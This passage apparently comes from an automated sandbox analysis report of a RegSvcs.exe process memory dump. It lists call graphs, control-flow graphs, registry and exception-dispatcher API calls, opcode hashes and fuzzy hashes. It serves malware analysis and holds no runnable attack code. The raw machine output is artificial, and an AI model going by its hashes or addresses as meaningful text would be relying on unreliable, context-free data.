30158->30159 30160 28796d KiUserExceptionDispatcher 30159->30160 30161 287989 30160->30161 30164 81af91 RegQueryValueExW 30161->30164 30165 81aff0 RegQueryValueExW 30161->30165 30162 287e24 30163 287e6c 30162->30163 30166 81af91 RegQueryValueExW 30162->30166 30167 81aff0 RegQueryValueExW 30162->30167 30163->29943 30164->30162 30165->30162 30166->30163 30167->30163 30169 287b0e 30168->30169 30172 81af91 RegQueryValueExW 30169->30172 30173 81aff0 RegQueryValueExW 30169->30173 30170 287e24 30171 287e6c 30170->30171 30174 81af91 RegQueryValueExW 30170->30174 30175 81aff0 RegQueryValueExW 30170->30175 30171->29943 30172->30170 30173->30170 30174->30171 30175->30171 30177 28788b 30176->30177 30178 28796d KiUserExceptionDispatcher 30177->30178 30179 287989 30178->30179 30182 81af91 RegQueryValueExW 30179->30182 30183 81aff0 RegQueryValueExW 30179->30183 30180 287e24 30181 287e6c 30180->30181 30184 81af91 RegQueryValueExW 30180->30184 30185 81aff0 RegQueryValueExW 30180->30185 30181->29943 30182->30180 30183->30180 30184->30181 30185->30181 30187 287777 30186->30187 30188 28796d KiUserExceptionDispatcher 30187->30188 30189 287989 30188->30189 30192 81af91 RegQueryValueExW 30189->30192 30193 81aff0 RegQueryValueExW 30189->30193 30190 287e24 30191 287e6c 30190->30191 30194 81af91 RegQueryValueExW 30190->30194 30195 81aff0 RegQueryValueExW 30190->30195 30191->29943 30192->30190 30193->30190 30194->30191 30195->30191 30197 2876f6 30196->30197 30203 813050 2 API calls 30197->30203 30204 812ff0 2 API calls 30197->30204 30198 287706 30199 28796d KiUserExceptionDispatcher 30198->30199 30200 287989 30199->30200 30205 81af91 RegQueryValueExW 30200->30205 30206 81aff0 RegQueryValueExW 30200->30206 30201 287e24 30202 287e6c 30201->30202 30207 81af91 RegQueryValueExW 30201->30207 30208 81aff0 RegQueryValueExW 30201->30208 30202->29943 30203->30198 30204->30198 30205->30201 30206->30201 30207->30202 30208->30202 30210 287cf4 30209->30210 30213 81af91 RegQueryValueExW 30210->30213 30214 81aff0 RegQueryValueExW 30210->30214 30211 287e24 30212 287e6c 30211->30212 30215 81af91 RegQueryValueExW 30211->30215 30216 81aff0 RegQueryValueExW 30211->30216 30212->29943 30213->30211 30214->30211 30215->30212 30216->30212 30218 2874f0 30217->30218 30224 813050 2 API calls 30218->30224 30225 812ff0 2 API calls 30218->30225 30219 287706 30220 28796d KiUserExceptionDispatcher 30219->30220 30221 287989 30220->30221 30226 81af91 RegQueryValueExW 30221->30226 30227 81aff0 RegQueryValueExW 30221->30227 30222 287e24 30223 287e6c 30222->30223 30228 81af91 RegQueryValueExW 30222->30228 30229 81aff0 RegQueryValueExW 30222->30229 30223->29943 30224->30219 30225->30219 30226->30222 30227->30222 30228->30223 30229->30223 30231 2879fa 30230->30231 30234 81af91 RegQueryValueExW 30231->30234 30235 81aff0 RegQueryValueExW 30231->30235 30232 287e24 30233 287e6c 30232->30233 30236 81af91 RegQueryValueExW 30232->30236 30237 81aff0 RegQueryValueExW 30232->30237 30233->29943 30234->30232 30235->30232 30236->30233 30237->30233 30239 287c28 30238->30239 30242 81af91 RegQueryValueExW 30239->30242 30243 81aff0 RegQueryValueExW 30239->30243 30240 287e24 30241 287e6c 30240->30241 30244 81af91 RegQueryValueExW 30240->30244 30245 81aff0 RegQueryValueExW 30240->30245 30241->29943 30242->30240 30243->30240 30244->30241 30245->30241 30247 287627 30246->30247 30253 813050 2 API calls 30247->30253 30254 812ff0 2 API calls 30247->30254 30248 287706 30249 28796d KiUserExceptionDispatcher 30248->30249 30250 287989 30249->30250 30255 81af91 RegQueryValueExW 30250->30255 30256 81aff0 RegQueryValueExW 30250->30256 30251 287e24 30252 287e6c 30251->30252 30257 81af91 RegQueryValueExW 30251->30257 30258 81aff0 RegQueryValueExW 30251->30258 30252->29943 30253->30248 30254->30248 30255->30251 30256->30251 30257->30252 30258->30252 30260 287b98 30259->30260 30263 81af91 RegQueryValueExW 30260->30263 30264 81aff0 RegQueryValueExW 30260->30264 30261 287e24 30262 287e6c 30261->30262 30265 81af91 RegQueryValueExW 30261->30265 30266 81aff0 RegQueryValueExW 30261->30266 30262->29943 30263->30261 30264->30261 30265->30262 30266->30262 30268 287915 30267->30268 30269 28796d KiUserExceptionDispatcher 30268->30269 30270 287989 30269->30270 30273 81af91 RegQueryValueExW 30270->30273 30274 81aff0 RegQueryValueExW 30270->30274 30271 287e24 30272 287e6c 30271->30272 30275 81af91 RegQueryValueExW 30271->30275 30276 81aff0 RegQueryValueExW 30271->30276 30272->29943 30273->30271 30274->30271 30275->30272 30276->30272 30278 28759d 30277->30278 30284 813050 2 API calls 30278->30284 30285 812ff0 2 API calls 30278->30285 30279 287706 30280 28796d KiUserExceptionDispatcher 30279->30280 30281 287989 30280->30281 30286 81af91 RegQueryValueExW 30281->30286 30287 81aff0 RegQueryValueExW 30281->30287 30282 287e24 30283 287e6c 30282->30283 30288 81af91 RegQueryValueExW 30282->30288 30289 81aff0 RegQueryValueExW 30282->30289 30283->29943 30284->30279 30285->30279 30286->30282 30287->30282 30288->30283 30289->30283 30291 28751c 30290->30291 30297 813050 2 API calls 30291->30297 30298 812ff0 2 API calls 30291->30298 30292 287706 30293 28796d KiUserExceptionDispatcher 30292->30293 30294 287989 30293->30294 30299 81af91 RegQueryValueExW 30294->30299 30300 81aff0 RegQueryValueExW 30294->30300 30295 287e24 30296 287e6c 30295->30296 30301 81af91 RegQueryValueExW 30295->30301 30302 81aff0 RegQueryValueExW 30295->30302 30296->29943 30297->30292 30298->30292 30299->30295 30300->30295 30301->30296 30302->30296 30304 287846 30303->30304 30305 28796d KiUserExceptionDispatcher 30304->30305 30306 287989 30305->30306 30309 81af91 RegQueryValueExW 30306->30309 30310 81aff0 RegQueryValueExW 30306->30310 30307 287e24 30308 287e6c 30307->30308 30311 81af91 RegQueryValueExW 30307->30311 30312 81aff0 RegQueryValueExW 30307->30312 30308->29943 30309->30307 30310->30307 30311->30308 30312->30308 30314 287e50 30313->30314 30315 287e6c 30314->30315 30316 81af91 RegQueryValueExW 30314->30316 30317 81aff0 RegQueryValueExW 30314->30317 30315->29943 30316->30315 30317->30315 30319 2878d0 30318->30319 30320 28796d KiUserExceptionDispatcher 30319->30320 30321 287989 30320->30321 30324 81af91 RegQueryValueExW 30321->30324 30325 81aff0 RegQueryValueExW 30321->30325 30322 287e24 30323 287e6c 30322->30323 30326 81af91 RegQueryValueExW 30322->30326 30327 81aff0 RegQueryValueExW 30322->30327 30323->29943 30324->30322 30325->30322 30326->30323 30327->30323 30329 81afb1 30328->30329 30331 81afd4 30328->30331 30329->29982 30332 81b3f0 30331->30332 30337 8135c8 RegQueryValueExW 30331->30337 30332->29982 30334 81b00b 30333->30334 30336 81b3f0 30334->30336 30338 8135c8 RegQueryValueExW 30334->30338 30336->29982 30337->30331 30338->30334 30343 81306f 30339->30343 30340 8132d7 30340->30024 30342 810c14 RegQueryValueExW 30342->30343 30343->30340 30343->30342 30350 810c08 30343->30350 30345 813011 30344->30345 30349 813034 30344->30349 30345->30024 30346 8132d7 30346->30024 30347 810c08 RegOpenKeyExW 30347->30349 30348 810c14 RegQueryValueExW 30348->30349 30349->30346 30349->30347 30349->30348 30351 813360 RegOpenKeyExW 30350->30351 30353 813426 30351->30353 30353->30353

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1499 810c08-8133b0 1501 8133b2-8133b5 1499->1501 1502 8133b8-813424 RegOpenKeyExW 1499->1502 1501->1502 1504 813426-81342c 1502->1504 1505 81342d-813465 1502->1505 1504->1505 1509 813467-813470 1505->1509 1510 813478 1505->1510 1509->1510 1511 813479 1510->1511 1511->1511
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00813414
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002381200.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_810000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID: PBa
                                                                                          • API String ID: 71445658-1795656683
                                                                                          • Opcode ID: 2c2fc939662b8b60c2852ced76226d814780c9d32bfeab4a1efb167a27533817
                                                                                          • Instruction ID: 1a7fc11ae4f480f74d574f01dc9cd793e650e40df771d592383c61f316eede62
                                                                                          • Opcode Fuzzy Hash: 2c2fc939662b8b60c2852ced76226d814780c9d32bfeab4a1efb167a27533817
                                                                                          • Instruction Fuzzy Hash: F731E0B0D042499FDB10CF99C588ADEFFF5BF49314F24816AE418AB341C775AA84CB95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3107 b20d30-b20d3c 3108 b20d61-b20d9c 3107->3108 3109 b20d3e-b20d48 3107->3109 3113 b20da8-b20e5e 3108->3113 3114 b20d9e-b20da5 3108->3114 3110 b20d4a-b20d5b 3109->3110 3111 b20d5d-b20d60 3109->3111 3110->3111 3131 b20e64-b20e6c 3113->3131 3132 b20f0a-b20f1b 3113->3132 3131->3132 3133 b20e72-b20e8e 3131->3133 3143 b20f20-b20f27 3132->3143 3137 b20e90-b20e94 3133->3137 3138 b20ecf-b20eea 3133->3138 3137->3132 3139 b20e96-b20eb7 3137->3139 3145 b20eee-b20efa 3138->3145 3146 b20eec 3138->3146 3139->3138 3152 b20eb9-b20ebf 3139->3152 3148 b20efc-b20eff 3145->3148 3146->3148 3155 b20f02 call b20f31 3148->3155 3156 b20f02 call b2133b 3148->3156 3151 b20f08 3151->3143 3153 b20ec3-b20ec5 3152->3153 3154 b20ec1 3152->3154 3153->3138 3154->3138 3155->3151 3156->3151
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fCFl$fCFl
                                                                                          • API String ID: 0-2356703646
                                                                                          • Opcode ID: e2536c9d131cffc9bc436c14c85b7e2f626377e7dd1ca9715dc3da7c4adfcd41
                                                                                          • Instruction ID: fb114ebc98cefb82ef6363cd198a822a1ae320c47faf1ab3628b920eb30d9d49
                                                                                          • Opcode Fuzzy Hash: e2536c9d131cffc9bc436c14c85b7e2f626377e7dd1ca9715dc3da7c4adfcd41
                                                                                          • Instruction Fuzzy Hash: 8D515930B042149FDB14FBB49906BAEBBE7DF88314F14C069E509CB282DF358C4287A2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3389 2874ea-28756b 3612 28756b call 28ac4f 3389->3612 3613 28756b call 28b070 3389->3613 3396 287571-2875f5 3534 2875f5 call 28b768 3396->3534 3535 2875f5 call 28b7b8 3396->3535 3536 2875f5 call 28ba08 3396->3536 3537 2875f5 call 28ba68 3396->3537 3538 2875f5 call 28b70e 3396->3538 3539 2875f5 call 28b720 3396->3539 3540 2875f5 call 28b967 3396->3540 3402 2875fb-28763a 3544 28763a call 28bb48 3402->3544 3545 28763a call 28c39e 3402->3545 3546 28763a call 28c790 3402->3546 3405 287640-28767f 3556 28767f call 812d10 3405->3556 3557 28767f call 812d02 3405->3557 3558 28767f call 812d6f 3405->3558 3408 287685-2876c4 3561 2876c4 call 812f12 3408->3561 3562 2876c4 call 812ec8 3408->3562 3411 2876ca-287700 3571 287700 call 813050 3411->3571 3572 287700 call 812ff0 3411->3572 3414 287706-287745 3583 287745 call 813857 3414->3583 3584 287745 call 8137f8 3414->3584 3585 287745 call 813748 3414->3585 3417 28774b-28778a 3591 28778a call 813977 3417->3591 3592 28778a call 8138b8 3417->3592 3593 28778a call 813918 3417->3593 3420 287790-2877cf 3598 2877cf call 813a97 3420->3598 3599 2877cf call 8139d8 3420->3599 3600 2877cf call 813a38 3420->3600 3423 2877d5-28789e 3608 28789e call 814390 3423->3608 3609 28789e call 81432e 3423->3609 3432 2878a4-287928 3616 287928 call 814820 3432->3616 3617 287928 call 814830 3432->3617 3618 287928 call 814927 3432->3618 3619 287928 call 8148c8 3432->3619 3438 28792e-2879c8 KiUserExceptionDispatcher 3547 2879c8 call 814da0 3438->3547 3548 2879c8 call 814ec7 3438->3548 3549 2879c8 call 814e68 3438->3549 3444 2879ce-287a0d 3559 287a0d call 814f29 3444->3559 3560 287a0d call 814f88 3444->3560 3447 287a13-287a97 3573 287a97 call 815490 3447->3573 3574 287a97 call 815659 3447->3574 3575 287a97 call 8152e8 3447->3575 3576 287a97 call 815348 3447->3576 3577 287a97 call 815758 3447->3577 3453 287a9d-287b21 3594 287b21 call 8165d0 3453->3594 3595 287b21 call 8165c8 3453->3595 3459 287b27-287bf6 3603 287bf6 call 817958 3459->3603 3604 287bf6 call 817aa8 3459->3604 3468 287bfc-287c3e 3610 287c3e call 817d98 3468->3610 3611 287c3e call 817da8 3468->3611 3471 287c44-287cc2 3620 287cc2 call 819668 3471->3620 3621 287cc2 call 8197b8 3471->3621 3622 287cc2 call 819718 3471->3622 3477 287cc8-287d52 call 819a40 3550 287d52 call 81a131 3477->3550 3551 287d52 call 81a320 3477->3551 3552 287d52 call 81a330 3477->3552 3553 287d52 call 81a379 3477->3553 3554 287d52 call 81a3c8 3477->3554 3555 287d52 call 819d88 3477->3555 3483 287d58-287dd6 3563 287dd6 call 81aed0 3483->3563 3564 287dd6 call 81ae20 3483->3564 3565 287dd6 call 81af2f 3483->3565 3489 287ddc-287e1e 3578 287e1e call 81af91 3489->3578 3579 287e1e call 81aff0 3489->3579 3492 287e24-287e66 3586 287e66 call 81af91 3492->3586 3587 287e66 call 81b410 3492->3587 3588 287e66 call 81aff0 3492->3588 3589 287e66 call 81b468 3492->3589 3590 287e66 call 81b3fd 3492->3590 3495 287e6c-287ea2 3596 287ea2 call 81b800 3495->3596 3597 287ea2 call 81b79b 3495->3597 3498 287ea8-287f26 3601 287f26 call 81ce50 3498->3601 3602 287f26 call 81ce4c 3498->3602 3504 287f2c-287f6e 3605 287f6e call 81e297 3504->3605 3606 287f6e call 81e238 3504->3606 3607 287f6e call 81dfa8 3504->3607 3507 287f74-287ffe 3614 287ffe call 81e5d0 3507->3614 3615 287ffe call 81e570 3507->3615 3513 288004-288046 3623 288046 call 81e998 3513->3623 3624 288046 call 81e9f8 3513->3624 3516 28804c-28808e 3542 28808e call 81ecc1 3516->3542 3543 28808e call 81ef30 3516->3543 3519 288094-28815a 3566 28815a call 81f6a0 3519->3566 3567 28815a call 81f192 3519->3567 3568 28815a call 81f977 3519->3568 3569 28815a call 81f198 3519->3569 3570 28815a call 81f8b8 3519->3570 3528 288160-2881a2 3580 2881a2 call 81fa97 3528->3580 3581 2881a2 call 81f9d8 3528->3581 3582 2881a2 call 81fa38 3528->3582 3531 2881a8-2881f7 3534->3402 3535->3402 3536->3402 3537->3402 3538->3402 3539->3402 3540->3402 3542->3519 3543->3519 3544->3405 3545->3405 3546->3405 3547->3444 3548->3444 3549->3444 3550->3483 3551->3483 3552->3483 3553->3483 3554->3483 3555->3483 3556->3408 3557->3408 3558->3408 3559->3447 3560->3447 3561->3411 3562->3411 3563->3489 3564->3489 3565->3489 3566->3528 3567->3528 3568->3528 3569->3528 3570->3528 3571->3414 3572->3414 3573->3453 3574->3453 3575->3453 3576->3453 3577->3453 3578->3492 3579->3492 3580->3531 3581->3531 3582->3531 3583->3417 3584->3417 3585->3417 3586->3495 3587->3495 3588->3495 3589->3495 3590->3495 3591->3420 3592->3420 3593->3420 3594->3459 3595->3459 3596->3498 3597->3498 3598->3423 3599->3423 3600->3423 3601->3504 3602->3504 3603->3468 3604->3468 3605->3507 3606->3507 3607->3507 3608->3432 3609->3432 3610->3471 3611->3471 3612->3396 3613->3396 3614->3513 3615->3513 3616->3438 3617->3438 3618->3438 3619->3438 3620->3477 3621->3477 3622->3477 3623->3516 3624->3516
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 954df604343b184ed48e8e751b958e60b3d3d9d4e0d164c5540136a43c2bdd99
                                                                                          • Instruction ID: 32e037e9dd6ac9c7d8fbdddde9c61fef42f1e6b4cafd9659f04604b261b0088a
                                                                                          • Opcode Fuzzy Hash: 954df604343b184ed48e8e751b958e60b3d3d9d4e0d164c5540136a43c2bdd99
                                                                                          • Instruction Fuzzy Hash: C502BB38926268CFCB65EF24C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3625 28750b-28756b 3791 28756b call 28ac4f 3625->3791 3792 28756b call 28b070 3625->3792 3632 287571-2875f5 3804 2875f5 call 28b768 3632->3804 3805 2875f5 call 28b7b8 3632->3805 3806 2875f5 call 28ba08 3632->3806 3807 2875f5 call 28ba68 3632->3807 3808 2875f5 call 28b70e 3632->3808 3809 2875f5 call 28b720 3632->3809 3810 2875f5 call 28b967 3632->3810 3638 2875fb-28763a 3814 28763a call 28bb48 3638->3814 3815 28763a call 28c39e 3638->3815 3816 28763a call 28c790 3638->3816 3641 287640-28767f 3826 28767f call 812d10 3641->3826 3827 28767f call 812d02 3641->3827 3828 28767f call 812d6f 3641->3828 3644 287685-2876c4 3831 2876c4 call 812f12 3644->3831 3832 2876c4 call 812ec8 3644->3832 3647 2876ca-287700 3841 287700 call 813050 3647->3841 3842 287700 call 812ff0 3647->3842 3650 287706-287745 3853 287745 call 813857 3650->3853 3854 287745 call 8137f8 3650->3854 3855 287745 call 813748 3650->3855 3653 28774b-28778a 3770 28778a call 813977 3653->3770 3771 28778a call 8138b8 3653->3771 3772 28778a call 813918 3653->3772 3656 287790-2877cf 3777 2877cf call 813a97 3656->3777 3778 2877cf call 8139d8 3656->3778 3779 2877cf call 813a38 3656->3779 3659 2877d5-28789e 3787 28789e call 814390 3659->3787 3788 28789e call 81432e 3659->3788 3668 2878a4-287928 3795 287928 call 814820 3668->3795 3796 287928 call 814830 3668->3796 3797 287928 call 814927 3668->3797 3798 287928 call 8148c8 3668->3798 3674 28792e-2879c8 KiUserExceptionDispatcher 3817 2879c8 call 814da0 3674->3817 3818 2879c8 call 814ec7 3674->3818 3819 2879c8 call 814e68 3674->3819 3680 2879ce-287a0d 3829 287a0d call 814f29 3680->3829 3830 287a0d call 814f88 3680->3830 3683 287a13-287a97 3843 287a97 call 815490 3683->3843 3844 287a97 call 815659 3683->3844 3845 287a97 call 8152e8 3683->3845 3846 287a97 call 815348 3683->3846 3847 287a97 call 815758 3683->3847 3689 287a9d-287b21 3773 287b21 call 8165d0 3689->3773 3774 287b21 call 8165c8 3689->3774 3695 287b27-287bf6 3782 287bf6 call 817958 3695->3782 3783 287bf6 call 817aa8 3695->3783 3704 287bfc-287c3e 3789 287c3e call 817d98 3704->3789 3790 287c3e call 817da8 3704->3790 3707 287c44-287cc2 3799 287cc2 call 819668 3707->3799 3800 287cc2 call 8197b8 3707->3800 3801 287cc2 call 819718 3707->3801 3713 287cc8-287d52 call 819a40 3820 287d52 call 81a131 3713->3820 3821 287d52 call 81a320 3713->3821 3822 287d52 call 81a330 3713->3822 3823 287d52 call 81a379 3713->3823 3824 287d52 call 81a3c8 3713->3824 3825 287d52 call 819d88 3713->3825 3719 287d58-287dd6 3833 287dd6 call 81aed0 3719->3833 3834 287dd6 call 81ae20 3719->3834 3835 287dd6 call 81af2f 3719->3835 3725 287ddc-287e1e 3848 287e1e call 81af91 3725->3848 3849 287e1e call 81aff0 3725->3849 3728 287e24-287e66 3856 287e66 call 81af91 3728->3856 3857 287e66 call 81b410 3728->3857 3858 287e66 call 81aff0 3728->3858 3859 287e66 call 81b468 3728->3859 3860 287e66 call 81b3fd 3728->3860 3731 287e6c-287ea2 3775 287ea2 call 81b800 3731->3775 3776 287ea2 call 81b79b 3731->3776 3734 287ea8-287f26 3780 287f26 call 81ce50 3734->3780 3781 287f26 call 81ce4c 3734->3781 3740 287f2c-287f6e 3784 287f6e call 81e297 3740->3784 3785 287f6e call 81e238 3740->3785 3786 287f6e call 81dfa8 3740->3786 3743 287f74-287ffe 3793 287ffe call 81e5d0 3743->3793 3794 287ffe call 81e570 3743->3794 3749 288004-288046 3802 288046 call 81e998 3749->3802 3803 288046 call 81e9f8 3749->3803 3752 28804c-28808e 3812 28808e call 81ecc1 3752->3812 3813 28808e call 81ef30 3752->3813 3755 288094-28815a 3836 28815a call 81f6a0 3755->3836 3837 28815a call 81f192 3755->3837 3838 28815a call 81f977 3755->3838 3839 28815a call 81f198 3755->3839 3840 28815a call 81f8b8 3755->3840 3764 288160-2881a2 3850 2881a2 call 81fa97 3764->3850 3851 2881a2 call 81f9d8 3764->3851 3852 2881a2 call 81fa38 3764->3852 3767 2881a8-2881f7 3770->3656 3771->3656 3772->3656 3773->3695 3774->3695 3775->3734 3776->3734 3777->3659 3778->3659 3779->3659 3780->3740 3781->3740 3782->3704 3783->3704 3784->3743 3785->3743 3786->3743 3787->3668 3788->3668 3789->3707 3790->3707 3791->3632 3792->3632 3793->3749 3794->3749 3795->3674 3796->3674 3797->3674 3798->3674 3799->3713 3800->3713 3801->3713 3802->3752 3803->3752 3804->3638 3805->3638 3806->3638 3807->3638 3808->3638 3809->3638 3810->3638 3812->3755 3813->3755 3814->3641 3815->3641 3816->3641 3817->3680 3818->3680 3819->3680 3820->3719 3821->3719 3822->3719 3823->3719 3824->3719 3825->3719 3826->3644 3827->3644 3828->3644 3829->3683 3830->3683 3831->3647 3832->3647 3833->3725 3834->3725 3835->3725 3836->3764 3837->3764 3838->3764 3839->3764 3840->3764 3841->3650 3842->3650 3843->3689 3844->3689 3845->3689 3846->3689 3847->3689 3848->3728 3849->3728 3850->3767 3851->3767 3852->3767 3853->3653 3854->3653 3855->3653 3856->3731 3857->3731 3858->3731 3859->3731 3860->3731
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 2ba502089292deb62bcf005c6805685aac36124320c7bc462c384a99ed532338
                                                                                          • Instruction ID: ea9419c9e9bc297fa2ffb065b9969c5f270b00cce3dc33616573b428e49a4db8
                                                                                          • Opcode Fuzzy Hash: 2ba502089292deb62bcf005c6805685aac36124320c7bc462c384a99ed532338
                                                                                          • Instruction Fuzzy Hash: 5502CB38916228CFCB65EF34C9886D9F772BF49305F2089EAD40AA6750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3861 287550-28756b 4092 28756b call 28ac4f 3861->4092 4093 28756b call 28b070 3861->4093 3865 287571-2875f5 4014 2875f5 call 28b768 3865->4014 4015 2875f5 call 28b7b8 3865->4015 4016 2875f5 call 28ba08 3865->4016 4017 2875f5 call 28ba68 3865->4017 4018 2875f5 call 28b70e 3865->4018 4019 2875f5 call 28b720 3865->4019 4020 2875f5 call 28b967 3865->4020 3871 2875fb-28763a 4024 28763a call 28bb48 3871->4024 4025 28763a call 28c39e 3871->4025 4026 28763a call 28c790 3871->4026 3874 287640-28767f 4036 28767f call 812d10 3874->4036 4037 28767f call 812d02 3874->4037 4038 28767f call 812d6f 3874->4038 3877 287685-2876c4 4041 2876c4 call 812f12 3877->4041 4042 2876c4 call 812ec8 3877->4042 3880 2876ca-287700 4051 287700 call 813050 3880->4051 4052 287700 call 812ff0 3880->4052 3883 287706-287745 4063 287745 call 813857 3883->4063 4064 287745 call 8137f8 3883->4064 4065 287745 call 813748 3883->4065 3886 28774b-28778a 4071 28778a call 813977 3886->4071 4072 28778a call 8138b8 3886->4072 4073 28778a call 813918 3886->4073 3889 287790-2877cf 4078 2877cf call 813a97 3889->4078 4079 2877cf call 8139d8 3889->4079 4080 2877cf call 813a38 3889->4080 3892 2877d5-28789e 4088 28789e call 814390 3892->4088 4089 28789e call 81432e 3892->4089 3901 2878a4-287928 4005 287928 call 814820 3901->4005 4006 287928 call 814830 3901->4006 4007 287928 call 814927 3901->4007 4008 287928 call 8148c8 3901->4008 3907 28792e-2879c8 KiUserExceptionDispatcher 4027 2879c8 call 814da0 3907->4027 4028 2879c8 call 814ec7 3907->4028 4029 2879c8 call 814e68 3907->4029 3913 2879ce-287a0d 4039 287a0d call 814f29 3913->4039 4040 287a0d call 814f88 3913->4040 3916 287a13-287a97 4053 287a97 call 815490 3916->4053 4054 287a97 call 815659 3916->4054 4055 287a97 call 8152e8 3916->4055 4056 287a97 call 815348 3916->4056 4057 287a97 call 815758 3916->4057 3922 287a9d-287b21 4074 287b21 call 8165d0 3922->4074 4075 287b21 call 8165c8 3922->4075 3928 287b27-287bf6 4083 287bf6 call 817958 3928->4083 4084 287bf6 call 817aa8 3928->4084 3937 287bfc-287c3e 4090 287c3e call 817d98 3937->4090 4091 287c3e call 817da8 3937->4091 3940 287c44-287cc2 4009 287cc2 call 819668 3940->4009 4010 287cc2 call 8197b8 3940->4010 4011 287cc2 call 819718 3940->4011 3946 287cc8-287d52 call 819a40 4030 287d52 call 81a131 3946->4030 4031 287d52 call 81a320 3946->4031 4032 287d52 call 81a330 3946->4032 4033 287d52 call 81a379 3946->4033 4034 287d52 call 81a3c8 3946->4034 4035 287d52 call 819d88 3946->4035 3952 287d58-287dd6 4043 287dd6 call 81aed0 3952->4043 4044 287dd6 call 81ae20 3952->4044 4045 287dd6 call 81af2f 3952->4045 3958 287ddc-287e1e 4058 287e1e call 81af91 3958->4058 4059 287e1e call 81aff0 3958->4059 3961 287e24-287e66 4066 287e66 call 81af91 3961->4066 4067 287e66 call 81b410 3961->4067 4068 287e66 call 81aff0 3961->4068 4069 287e66 call 81b468 3961->4069 4070 287e66 call 81b3fd 3961->4070 3964 287e6c-287ea2 4076 287ea2 call 81b800 3964->4076 4077 287ea2 call 81b79b 3964->4077 3967 287ea8-287f26 4081 287f26 call 81ce50 3967->4081 4082 287f26 call 81ce4c 3967->4082 3973 287f2c-287f6e 4085 287f6e call 81e297 3973->4085 4086 287f6e call 81e238 3973->4086 4087 287f6e call 81dfa8 3973->4087 3976 287f74-287ffe 4003 287ffe call 81e5d0 3976->4003 4004 287ffe call 81e570 3976->4004 3982 288004-288046 4012 288046 call 81e998 3982->4012 4013 288046 call 81e9f8 3982->4013 3985 28804c-28808e 4022 28808e call 81ecc1 3985->4022 4023 28808e call 81ef30 3985->4023 3988 288094-28815a 4046 28815a call 81f6a0 3988->4046 4047 28815a call 81f192 3988->4047 4048 28815a call 81f977 3988->4048 4049 28815a call 81f198 3988->4049 4050 28815a call 81f8b8 3988->4050 3997 288160-2881a2 4060 2881a2 call 81fa97 3997->4060 4061 2881a2 call 81f9d8 3997->4061 4062 2881a2 call 81fa38 3997->4062 4000 2881a8-2881f7 4003->3982 4004->3982 4005->3907 4006->3907 4007->3907 4008->3907 4009->3946 4010->3946 4011->3946 4012->3985 4013->3985 4014->3871 4015->3871 4016->3871 4017->3871 4018->3871 4019->3871 4020->3871 4022->3988 4023->3988 4024->3874 4025->3874 4026->3874 4027->3913 4028->3913 4029->3913 4030->3952 4031->3952 4032->3952 4033->3952 4034->3952 4035->3952 4036->3877 4037->3877 4038->3877 4039->3916 4040->3916 4041->3880 4042->3880 4043->3958 4044->3958 4045->3958 4046->3997 4047->3997 4048->3997 4049->3997 4050->3997 4051->3883 4052->3883 4053->3922 4054->3922 4055->3922 4056->3922 4057->3922 4058->3961 4059->3961 4060->4000 4061->4000 4062->4000 4063->3886 4064->3886 4065->3886 4066->3964 4067->3964 4068->3964 4069->3964 4070->3964 4071->3889 4072->3889 4073->3889 4074->3928 4075->3928 4076->3967 4077->3967 4078->3892 4079->3892 4080->3892 4081->3973 4082->3973 4083->3937 4084->3937 4085->3976 4086->3976 4087->3976 4088->3901 4089->3901 4090->3940 4091->3940 4092->3865 4093->3865
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
